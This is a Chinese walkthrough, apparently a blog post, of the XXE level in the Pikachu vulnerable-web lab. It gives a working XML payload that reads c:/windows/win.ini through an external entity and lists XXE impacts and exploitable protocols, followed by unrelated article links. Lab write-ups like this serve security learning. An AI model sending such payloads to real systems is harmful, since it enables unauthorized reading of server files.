当前位置: 首页 > news >正文

pikachu XXE(XML外部实体注入)通关

靶场:pikachu

环境:

系统:Windows10
服务器:PHPstudy2018
靶场:pikachu

关卡提示说:这是一个接收xml数据的api

常用的Payload

回显

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe "XXE" > ]> 
<foo>&xxe;</foo>

 执行结果

查看系统文件内容

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]> 
<foo>&xxe;</foo>

 执行结果

XXE的危害:

  1. 文件读取

  2. 内网主机扫描

  3. 端口探测

  4. 远程代码执行

XXE漏洞可利用的协议:

  1. ilbxml2=file/http/ftp

  2. PHP=file、http、ftp、php、compress.zlib、compress.bzip2、data、glob、phar

  3. Java=http、https、ftp、file、jar、netdoc、mailto、gophar

  4. NET=file、http、https、ftp

概述

XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

http://www.lryc.cn/news/447069.html

相关文章:

  • shell脚本定时任务通知到钉钉
  • 2.4K star的GOT-OCR2.0:端到端OCR 模型
  • 【JavaEE】——线程的安全问题和解决方式
  • 初步认识了解分布式系统
  • react 为什么不能学习 vue3 进行静态节点标记优化性能?
  • Elasticsearch黑窗口启动乱码问题解决方案
  • Logtus IT员工参加国际技术大会
  • ant design vue组件中table组件设置分组头部和固定总结栏
  • 2024年信息安全企业CRM选型与应用研究报告
  • 【后端开发】JavaEE初阶——计算机是如何工作的???
  • Linux(Ubuntu)源码安装postgresql16.3
  • Python 入门教程(7)面向对象 | 7.6、多态
  • Cilium + ebpf 系列文章-什么是ebpf?(一)
  • RabbitMQ08_保证消息可靠性
  • 恶意Bot流量识别分析实践
  • Java2 实用教程(第6版)习题2 第四题
  • HashMap和ConcurrentHashMap的区别
  • css 下拉框展示:当hover的时候展示下拉框 z-index的用法解释
  • spring装配笔记
  • vscode【实用插件】Notes 便捷做笔记
  • 中间件:maxwell、canal
  • postman控制变量和常用方法
  • Spring Boot 中整合 Kafka
  • 什么是开放式耳机?具有什么特色?非常值得入手的蓝牙耳机推荐
  • 编译 FFmpeg 以支持 AV1 编解码器以及其他硬件加速选项(如 NVENC、VAAPI 等)
  • 解释一下Java中的多线程。如何创建一个新的线程?
  • Java语言程序设计基础篇_编程练习题**18.30 (找出单词)
  • MyBatis中 #{} 和 ${} 的区别
  • Android Perfetto 学习
  • ES数据的删除与备份